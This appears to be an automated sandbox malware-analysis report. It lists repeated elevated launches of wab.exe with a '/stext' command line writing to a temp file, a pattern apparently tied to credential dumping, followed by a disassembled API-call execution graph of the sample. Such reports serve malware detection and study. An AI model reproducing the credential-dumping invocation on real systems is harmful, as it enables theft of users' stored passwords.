                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:29
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:30
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:31
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:32
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:33
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:34
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:35
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:36
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:37
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:38
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:39
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:40
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:41
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:42
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:43
                                                          Start time:08:02:03
                                                          Start date:28/03/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu"
                                                          Imagebase:0x460000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:21.2%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:25%
                                                            Total number of Nodes:1450
                                                            Total number of Limit Nodes:36
                                                            execution_graph 4201 402840 4202 402bbf 18 API calls 4201->4202 4204 40284e 4202->4204 4203 402864 4206 405d2e 2 API calls 4203->4206 4204->4203 4205 402bbf 18 API calls 4204->4205 4205->4203 4207 40286a 4206->4207 4229 405d53 GetFileAttributesW CreateFileW 4207->4229 4209 402877 4210 402883 GlobalAlloc 4209->4210 4211 40291a 4209->4211 4214 402911 CloseHandle 4210->4214 4215 40289c 4210->4215 4212 402922 DeleteFileW 4211->4212 4213 402935 4211->4213 4212->4213 4214->4211 4230 40336e SetFilePointer 4215->4230 4217 4028a2 4218 403358 ReadFile 4217->4218 4219 4028ab GlobalAlloc 4218->4219 4220 4028bb 4219->4220 4221 4028ef 4219->4221 4222 4030e7 45 API calls 4220->4222 4223 405e05 WriteFile 4221->4223 4224 4028c8 4222->4224 4225 4028fb GlobalFree 4223->4225 4227 4028e6 GlobalFree 4224->4227 4226 4030e7 45 API calls 4225->4226 4228 40290e 4226->4228 4227->4221 4228->4214 4229->4209 4230->4217 4231 10001000 4232 10001112 83 API calls 4231->4232 4233 1000102b 4232->4233 4234 401cc0 4235 402ba2 18 API calls 4234->4235 4236 401cc7 4235->4236 4237 402ba2 18 API calls 4236->4237 4238 401ccf GetDlgItem 4237->4238 4239 402531 4238->4239 4240 4029c0 4241 402ba2 18 API calls 4240->4241 4242 4029c6 4241->4242 4243 4029f9 4242->4243 4244 40281e 4242->4244 4246 4029d4 4242->4246 4243->4244 4245 4061a0 18 API calls 4243->4245 4245->4244 4246->4244 4248 4060c5 wsprintfW 4246->4248 4248->4244 3297 401fc3 3298 401fd5 3297->3298 3307 402087 3297->3307 3317 402bbf 3298->3317 3301 401423 25 API calls 3308 4021e1 3301->3308 3302 402bbf 18 API calls 3303 401fe5 3302->3303 3304 401ffb LoadLibraryExW 3303->3304 3305 401fed GetModuleHandleW 3303->3305 3306 40200c 3304->3306 3304->3307 3305->3304 3305->3306 3323 4065c7 WideCharToMultiByte 3306->3323 3307->3301 3311 402056 3329 4052dd 3311->3329 3312 40201d 3315 40202d 3312->3315 3326 401423 3312->3326 3315->3308 3316 402079 FreeLibrary 3315->3316 3316->3308 3318 402bcb 3317->3318 3340 4061a0 3318->3340 3321 401fdc 3321->3302 3324 4065f1 GetProcAddress 3323->3324 3325 402017 3323->3325 3324->3325 3325->3311 3325->3312 3327 4052dd 25 API calls 3326->3327 3328 401431 3327->3328 3328->3315 3330 4052f8 3329->3330 3331 40539a 3329->3331 3332 405314 lstrlenW 3330->3332 3333 4061a0 18 API calls 3330->3333 3331->3315 3334 405322 lstrlenW 3332->3334 3335 40533d 3332->3335 3333->3332 3334->3331 3336 405334 lstrcatW 3334->3336 3337 405350 3335->3337 3338 405343 SetWindowTextW 3335->3338 3336->3335 3337->3331 3339 405356 SendMessageW SendMessageW SendMessageW 3337->3339 3338->3337 3339->3331 3346 4061ad 3340->3346 3341 4063f8 3342 402bec 3341->3342 3374 40617e lstrcpynW 3341->3374 3342->3321 3358 406412 3342->3358 3344 406260 GetVersion 3344->3346 3345 4063c6 lstrlenW 3345->3346 3346->3341 3346->3344 3346->3345 3347 4061a0 10 API calls 3346->3347 3351 4062db GetSystemDirectoryW 3346->3351 3352 4062ee GetWindowsDirectoryW 3346->3352 3353 406412 5 API calls 3346->3353 3354 4061a0 10 API calls 3346->3354 3355 406367 lstrcatW 3346->3355 3356 406322 SHGetSpecialFolderLocation 3346->3356 3367 40604b RegOpenKeyExW 3346->3367 3372 4060c5 wsprintfW 3346->3372 3373 40617e lstrcpynW 3346->3373 3347->3345 3351->3346 3352->3346 3353->3346 3354->3346 3355->3346 3356->3346 3357 40633a SHGetPathFromIDListW CoTaskMemFree 3356->3357 3357->3346 3365 40641f 3358->3365 3359 406495 3360 40649a CharPrevW 3359->3360 3362 4064bb 3359->3362 3360->3359 3361 406488 CharNextW 3361->3359 3361->3365 3362->3321 3364 406474 CharNextW 3364->3365 3365->3359 3365->3361 3365->3364 3366 406483 CharNextW 3365->3366 3375 405b5f 3365->3375 3366->3361 3368 4060bf 3367->3368 3369 40607f RegQueryValueExW 3367->3369 3368->3346 3370 4060a0 RegCloseKey 3369->3370 3370->3368 3372->3346 3373->3346 3374->3342 3376 405b65 3375->3376 3377 405b7b 3376->3377 3378 405b6c CharNextW 3376->3378 3377->3365 3378->3376 4249 4016c4 4250 402bbf 18 API calls 4249->4250 4251 4016ca GetFullPathNameW 4250->4251 4252 4016e4 4251->4252 4258 401706 4251->4258 4255 4064c1 2 API calls 4252->4255 4252->4258 4253 40171b GetShortPathNameW 4254 402a4c 4253->4254 4256 4016f6 4255->4256 4256->4258 4259 40617e lstrcpynW 4256->4259 4258->4253 4258->4254 4259->4258 4260 406846 4262 4066ca 4260->4262 4261 407035 4262->4261 4262->4262 4263 406754 GlobalAlloc 4262->4263 4264 40674b GlobalFree 4262->4264 4265 4067c2 GlobalFree 4262->4265 4266 4067cb GlobalAlloc 4262->4266 4263->4261 4263->4262 4264->4263 4265->4266 4266->4261 4266->4262 4270 40194e 4271 402bbf 18 API calls 4270->4271 4272 401955 lstrlenW 4271->4272 4273 402531 4272->4273 4274 4027ce 4275 4027d6 4274->4275 4276 4027da FindNextFileW 4275->4276 4279 4027ec 4275->4279 4277 402833 4276->4277 4276->4279 4280 40617e lstrcpynW 4277->4280 4280->4279 4288 405251 4289 405261 4288->4289 4290 405275 4288->4290 4291 4052be 4289->4291 4292 405267 4289->4292 4293 40527d IsWindowVisible 4290->4293 4299 405294 4290->4299 4294 4052c3 CallWindowProcW 4291->4294 4295 40428e SendMessageW 4292->4295 4293->4291 4296 40528a 4293->4296 4297 405271 4294->4297 4295->4297 4301 404ba7 SendMessageW 4296->4301 4299->4294 4306 404c27 4299->4306 4302 404c06 SendMessageW 4301->4302 4303 404bca GetMessagePos ScreenToClient SendMessageW 4301->4303 4305 404bfe 4302->4305 4304 404c03 4303->4304 4303->4305 4304->4302 4305->4299 4315 40617e lstrcpynW 4306->4315 4308 404c3a 4316 4060c5 wsprintfW 4308->4316 4310 404c44 4311 40140b 2 API calls 4310->4311 4312 404c4d 4311->4312 4317 40617e lstrcpynW 4312->4317 4314 404c54 4314->4291 4315->4308 4316->4310 4317->4314 3379 401754 3380 402bbf 18 API calls 3379->3380 3381 40175b 3380->3381 3385 405d82 3381->3385 3383 401762 3384 405d82 2 API calls 3383->3384 3384->3383 3386 405d8f GetTickCount GetTempFileNameW 3385->3386 3387 405dc9 3386->3387 3388 405dc5 3386->3388 3387->3383 3388->3386 3388->3387 4318 404356 lstrcpynW lstrlenW 4319 401d56 GetDC GetDeviceCaps 4320 402ba2 18 API calls 4319->4320 4321 401d74 MulDiv ReleaseDC 4320->4321 4322 402ba2 18 API calls 4321->4322 4323 401d93 4322->4323 4324 4061a0 18 API calls 4323->4324 4325 401dcc CreateFontIndirectW 4324->4325 4326 402531 4325->4326 4327 401a57 4328 402ba2 18 API calls 4327->4328 4329 401a5d 4328->4329 4330 402ba2 18 API calls 4329->4330 4331 401a05 4330->4331 4332 4014d7 4333 402ba2 18 API calls 4332->4333 4334 4014dd Sleep 4333->4334 4336 402a4c 4334->4336 4337 404c59 GetDlgItem GetDlgItem 4338 404cab 7 API calls 4337->4338 4345 404ec4 4337->4345 4339 404d41 SendMessageW 4338->4339 4340 404d4e DeleteObject 4338->4340 4339->4340 4341 404d57 4340->4341 4343 404d8e 4341->4343 4344 4061a0 18 API calls 4341->4344 4342 404fa8 4347 405054 4342->4347 4353 405001 SendMessageW 4342->4353 4380 404eb7 4342->4380 4346 404242 19 API calls 4343->4346 4349 404d70 SendMessageW SendMessageW 4344->4349 4345->4342 4348 404f35 4345->4348 4356 404ba7 5 API calls 4345->4356 4352 404da2 4346->4352 4350 405066 4347->4350 4351 40505e SendMessageW 4347->4351 4348->4342 4355 404f9a SendMessageW 4348->4355 4349->4341 4361 405078 ImageList_Destroy 4350->4361 4362 40507f 4350->4362 4372 40508f 4350->4372 4351->4350 4357 404242 19 API calls 4352->4357 4359 405016 SendMessageW 4353->4359 4353->4380 4354 4042a9 8 API calls 4360 40524a 4354->4360 4355->4342 4356->4348 4368 404db0 4357->4368 4358 4051fe 4366 405210 ShowWindow GetDlgItem ShowWindow 4358->4366 4358->4380 4363 405029 4359->4363 4361->4362 4364 405088 GlobalFree 4362->4364 4362->4372 4373 40503a SendMessageW 4363->4373 4364->4372 4365 404e85 GetWindowLongW SetWindowLongW 4367 404e9e 4365->4367 4366->4380 4369 404ea4 ShowWindow 4367->4369 4370 404ebc 4367->4370 4368->4365 4371 404e00 SendMessageW 4368->4371 4374 404e7f 4368->4374 4377 404e3c SendMessageW 4368->4377 4378 404e4d SendMessageW 4368->4378 4388 404277 SendMessageW 4369->4388 4389 404277 SendMessageW 4370->4389 4371->4368 4372->4358 4379 404c27 4 API calls 4372->4379 4384 4050ca 4372->4384 4373->4347 4374->4365 4374->4367 4377->4368 4378->4368 4379->4384 4380->4354 4381 4051d4 InvalidateRect 4381->4358 4382 4051ea 4381->4382 4390 404b62 4382->4390 4383 4050f8 SendMessageW 4387 40510e 4383->4387 4384->4383 4384->4387 4386 405182 SendMessageW SendMessageW 4386->4387 4387->4381 4387->4386 4388->4380 4389->4345 4393 404a99 4390->4393 4392 404b77 4392->4358 4395 404ab2 4393->4395 4394 4061a0 18 API calls 4396 404b16 4394->4396 4395->4394 4397 4061a0 18 API calls 4396->4397 4398 404b21 4397->4398 4399 4061a0 18 API calls 4398->4399 4400 404b37 lstrlenW wsprintfW SetDlgItemTextW 4399->4400 4400->4392 4401 40155b 4402 4029f2 4401->4402 4405 4060c5 wsprintfW 4402->4405 4404 4029f7 4405->4404 4406 401ddc 4407 402ba2 18 API calls 4406->4407 4408 401de2 4407->4408 4409 402ba2 18 API calls 4408->4409 4410 401deb 4409->4410 4411 401df2 ShowWindow 4410->4411 4412 401dfd EnableWindow 4410->4412 4413 402a4c 4411->4413 4412->4413 4414 4046dd 4415 404709 4414->4415 4416 40471a 4414->4416 4475 4058a7 GetDlgItemTextW 4415->4475 4418 404726 GetDlgItem 4416->4418 4421 404785 4416->4421 4419 40473a 4418->4419 4424 40474e SetWindowTextW 4419->4424 4427 405bdd 4 API calls 4419->4427 4420 404869 4473 404a18 4420->4473 4477 4058a7 GetDlgItemTextW 4420->4477 4421->4420 4429 4061a0 18 API calls 4421->4429 4421->4473 4422 404714 4423 406412 5 API calls 4422->4423 4423->4416 4428 404242 19 API calls 4424->4428 4426 4042a9 8 API calls 4431 404a2c 4426->4431 4432 404744 4427->4432 4433 40476a 4428->4433 4434 4047f9 SHBrowseForFolderW 4429->4434 4430 404899 4435 405c3a 18 API calls 4430->4435 4432->4424 4438 405b32 3 API calls 4432->4438 4436 404242 19 API calls 4433->4436 4434->4420 4437 404811 CoTaskMemFree 4434->4437 4441 40489f 4435->4441 4439 404778 4436->4439 4440 405b32 3 API calls 4437->4440 4438->4424 4476 404277 SendMessageW 4439->4476 4443 40481e 4440->4443 4478 40617e lstrcpynW 4441->4478 4446 404855 SetDlgItemTextW 4443->4446 4450 4061a0 18 API calls 4443->4450 4445 40477e 4448 406558 5 API calls 4445->4448 4446->4420 4447 4048b6 4449 406558 5 API calls 4447->4449 4448->4421 4456 4048bd 4449->4456 4451 40483d lstrcmpiW 4450->4451 4451->4446 4453 40484e lstrcatW 4451->4453 4452 4048fe 4479 40617e lstrcpynW 4452->4479 4453->4446 4455 404905 4457 405bdd 4 API calls 4455->4457 4456->4452 4461 405b7e 2 API calls 4456->4461 4462 404956 4456->4462 4458 40490b GetDiskFreeSpaceW 4457->4458 4460 40492f MulDiv 4458->4460 4458->4462 4460->4462 4461->4456 4463 4049c7 4462->4463 4465 404b62 21 API calls 4462->4465 4464 4049ea 4463->4464 4466 40140b 2 API calls 4463->4466 4480 404264 KiUserCallbackDispatcher 4464->4480 4467 4049b4 4465->4467 4466->4464 4469 4049c9 SetDlgItemTextW 4467->4469 4470 4049b9 4467->4470 4469->4463 4471 404a99 21 API calls 4470->4471 4471->4463 4472 404a06 4472->4473 4481 404672 4472->4481 4473->4426 4475->4422 4476->4445 4477->4430 4478->4447 4479->4455 4480->4472 4482 404680 4481->4482 4483 404685 SendMessageW 4481->4483 4482->4483 4483->4473 4484 4043df 4485 404511 4484->4485 4486 4043f7 4484->4486 4487 40457b 4485->4487 4489 40464d 4485->4489 4493 40454c GetDlgItem SendMessageW 4485->4493 4490 404242 19 API calls 4486->4490 4488 404585 GetDlgItem 4487->4488 4487->4489 4491 40460e 4488->4491 4492 40459f 4488->4492 4495 4042a9 8 API calls 4489->4495 4494 40445e 4490->4494 4491->4489 4497 404620 4491->4497 4492->4491 4496 4045c5 6 API calls 4492->4496 4515 404264 KiUserCallbackDispatcher 4493->4515 4499 404242 19 API calls 4494->4499 4500 404648 4495->4500 4496->4491 4501 404636 4497->4501 4502 404626 SendMessageW 4497->4502 4504 40446b CheckDlgButton 4499->4504 4501->4500 4505 40463c SendMessageW 4501->4505 4502->4501 4503 404576 4506 404672 SendMessageW 4503->4506 4513 404264 KiUserCallbackDispatcher 4504->4513 4505->4500 4506->4487 4508 404489 GetDlgItem 4514 404277 SendMessageW 4508->4514 4510 40449f SendMessageW 4511 4044c5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4510->4511 4512 4044bc GetSysColor 4510->4512 4511->4500 4512->4511 4513->4508 4514->4510 4515->4503 4516 401bdf 4517 402ba2 18 API calls 4516->4517 4518 401be6 4517->4518 4519 402ba2 18 API calls 4518->4519 4520 401bf0 4519->4520 4521 401c00 4520->4521 4522 402bbf 18 API calls 4520->4522 4523 401c10 4521->4523 4524 402bbf 18 API calls 4521->4524 4522->4521 4525 401c1b 4523->4525 4526 401c5f 4523->4526 4524->4523 4528 402ba2 18 API calls 4525->4528 4527 402bbf 18 API calls 4526->4527 4529 401c64 4527->4529 4530 401c20 4528->4530 4531 402bbf 18 API calls 4529->4531 4532 402ba2 18 API calls 4530->4532 4533 401c6d FindWindowExW 4531->4533 4534 401c29 4532->4534 4537 401c8f 4533->4537 4535 401c31 SendMessageTimeoutW 4534->4535 4536 401c4f SendMessageW 4534->4536 4535->4537 4536->4537 4538 4022df 4539 402bbf 18 API calls 4538->4539 4540 4022ee 4539->4540 4541 402bbf 18 API calls 4540->4541 4542 4022f7 4541->4542 4543 402bbf 18 API calls 4542->4543 4544 402301 GetPrivateProfileStringW 4543->4544 4545 401960 4546 402ba2 18 API calls 4545->4546 4547 401967 4546->4547 4548 402ba2 18 API calls 4547->4548 4549 401971 4548->4549 4550 402bbf 18 API calls 4549->4550 4551 40197a 4550->4551 4552 40198e lstrlenW 4551->4552 4557 4019ca 4551->4557 4553 401998 4552->4553 4553->4557 4558 40617e lstrcpynW 4553->4558 4555 4019b3 4556 4019c0 lstrlenW 4555->4556 4555->4557 4556->4557 4558->4555 4559 401662 4560 402bbf 18 API calls 4559->4560 4561 401668 4560->4561 4562 4064c1 2 API calls 4561->4562 4563 40166e 4562->4563 4564 4019e4 4565 402bbf 18 API calls 4564->4565 4566 4019eb 4565->4566 4567 402bbf 18 API calls 4566->4567 4568 4019f4 4567->4568 4569 4019fb lstrcmpiW 4568->4569 4570 401a0d lstrcmpW 4568->4570 4571 401a01 4569->4571 4570->4571 4572 4025e5 4573 402ba2 18 API calls 4572->4573 4577 4025f4 4573->4577 4574 40272d 4575 40263a ReadFile 4575->4574 4575->4577 4576 405dd6 ReadFile 4576->4577 4577->4574 4577->4575 4577->4576 4578 40267a MultiByteToWideChar 4577->4578 4579 40272f 4577->4579 4582 4026a0 SetFilePointer MultiByteToWideChar 4577->4582 4583 402740 4577->4583 4585 405e34 SetFilePointer 4577->4585 4578->4577 4594 4060c5 wsprintfW 4579->4594 4582->4577 4583->4574 4584 402761 SetFilePointer 4583->4584 4584->4574 4586 405e50 4585->4586 4591 405e6c 4585->4591 4587 405dd6 ReadFile 4586->4587 4588 405e5c 4587->4588 4589 405e75 SetFilePointer 4588->4589 4590 405e9d SetFilePointer 4588->4590 4588->4591 4589->4590 4592 405e80 4589->4592 4590->4591 4591->4577 4593 405e05 WriteFile 4592->4593 4593->4591 4594->4574 4595 406ae5 4596 4066ca 4595->4596 4597 407035 4596->4597 4598 406754 GlobalAlloc 4596->4598 4599 40674b GlobalFree 4596->4599 4600 4067c2 GlobalFree 4596->4600 4601 4067cb GlobalAlloc 4596->4601 4598->4596 4598->4597 4599->4598 4600->4601 4601->4596 4601->4597 4602 401e66 4603 402bbf 18 API calls 4602->4603 4604 401e6c 4603->4604 4605 4052dd 25 API calls 4604->4605 4606 401e76 4605->4606 4607 40585e 2 API calls 4606->4607 4608 401e7c 4607->4608 4609 401edb CloseHandle 4608->4609 4610 401e8c WaitForSingleObject 4608->4610 4613 40281e 4608->4613 4609->4613 4611 401e9e 4610->4611 4612 401eb0 GetExitCodeProcess 4611->4612 4614 406594 2 API calls 4611->4614 4615 401ec2 4612->4615 4616 401ecd 4612->4616 4617 401ea5 WaitForSingleObject 4614->4617 4619 4060c5 wsprintfW 4615->4619 4616->4609 4617->4611 4619->4616 3840 401767 3841 402bbf 18 API calls 3840->3841 3842 40176e 3841->3842 3843 401796 3842->3843 3844 40178e 3842->3844 3880 40617e lstrcpynW 3843->3880 3879 40617e lstrcpynW 3844->3879 3847 401794 3851 406412 5 API calls 3847->3851 3848 4017a1 3849 405b32 3 API calls 3848->3849 3850 4017a7 lstrcatW 3849->3850 3850->3847 3868 4017b3 3851->3868 3852 4064c1 2 API calls 3852->3868 3853 405d2e 2 API calls 3853->3868 3855 4017c5 CompareFileTime 3855->3868 3856 401885 3857 4052dd 25 API calls 3856->3857 3860 40188f 3857->3860 3858 4052dd 25 API calls 3861 401871 3858->3861 3859 40617e lstrcpynW 3859->3868 3862 4030e7 45 API calls 3860->3862 3863 4018a2 3862->3863 3864 4018b6 SetFileTime 3863->3864 3865 4018c8 FindCloseChangeNotification 3863->3865 3864->3865 3865->3861 3867 4018d9 3865->3867 3866 4061a0 18 API calls 3866->3868 3869 4018f1 3867->3869 3870 4018de 3867->3870 3868->3852 3868->3853 3868->3855 3868->3856 3868->3859 3868->3866 3873 4058c3 MessageBoxIndirectW 3868->3873 3877 40185c 3868->3877 3878 405d53 GetFileAttributesW CreateFileW 3868->3878 3872 4061a0 18 API calls 3869->3872 3871 4061a0 18 API calls 3870->3871 3874 4018e6 lstrcatW 3871->3874 3875 4018f9 3872->3875 3873->3868 3874->3875 3876 4058c3 MessageBoxIndirectW 3875->3876 3876->3861 3877->3858 3877->3861 3878->3868 3879->3847 3880->3848 4620 401ee9 4621 402bbf 18 API calls 4620->4621 4622 401ef0 4621->4622 4623 4064c1 2 API calls 4622->4623 4624 401ef6 4623->4624 4626 401f07 4624->4626 4627 4060c5 wsprintfW 4624->4627 4627->4626 3919 403d6a 3920 403d82 3919->3920 3921 403ebd 3919->3921 3920->3921 3922 403d8e 3920->3922 3923 403f0e 3921->3923 3924 403ece GetDlgItem GetDlgItem 3921->3924 3925 403d99 SetWindowPos 3922->3925 3926 403dac 3922->3926 3928 403f68 3923->3928 3933 401389 2 API calls 3923->3933 3927 404242 19 API calls 3924->3927 3925->3926 3930 403db1 ShowWindow 3926->3930 3931 403dc9 3926->3931 3932 403ef8 SetClassLongW 3927->3932 3929 40428e SendMessageW 3928->3929 3951 403eb8 3928->3951 3949 403f7a 3929->3949 3930->3931 3934 403dd1 DestroyWindow 3931->3934 3935 403deb 3931->3935 3936 40140b 2 API calls 3932->3936 3937 403f40 3933->3937 3988 4041cb 3934->3988 3938 403df0 SetWindowLongW 3935->3938 3939 403e01 3935->3939 3936->3923 3937->3928 3942 403f44 SendMessageW 3937->3942 3938->3951 3940 403eaa 3939->3940 3941 403e0d GetDlgItem 3939->3941 3998 4042a9 3940->3998 3945 403e20 SendMessageW IsWindowEnabled 3941->3945 3946 403e3d 3941->3946 3942->3951 3943 40140b 2 API calls 3943->3949 3944 4041cd DestroyWindow EndDialog 3944->3988 3945->3946 3945->3951 3950 403e42 3946->3950 3953 403e4a 3946->3953 3954 403e91 SendMessageW 3946->3954 3955 403e5d 3946->3955 3948 4041fc ShowWindow 3948->3951 3949->3943 3949->3944 3949->3951 3952 4061a0 18 API calls 3949->3952 3957 404242 19 API calls 3949->3957 3979 40410d DestroyWindow 3949->3979 3989 404242 3949->3989 3995 40421b 3950->3995 3952->3949 3953->3950 3953->3954 3954->3940 3958 403e65 3955->3958 3959 403e7a 3955->3959 3957->3949 3962 40140b 2 API calls 3958->3962 3961 40140b 2 API calls 3959->3961 3960 403e78 3960->3940 3963 403e81 3961->3963 3962->3950 3963->3940 3963->3950 3965 403ff5 GetDlgItem 3966 404012 ShowWindow KiUserCallbackDispatcher 3965->3966 3967 40400a 3965->3967 3992 404264 KiUserCallbackDispatcher 3966->3992 3967->3966 3969 40403c 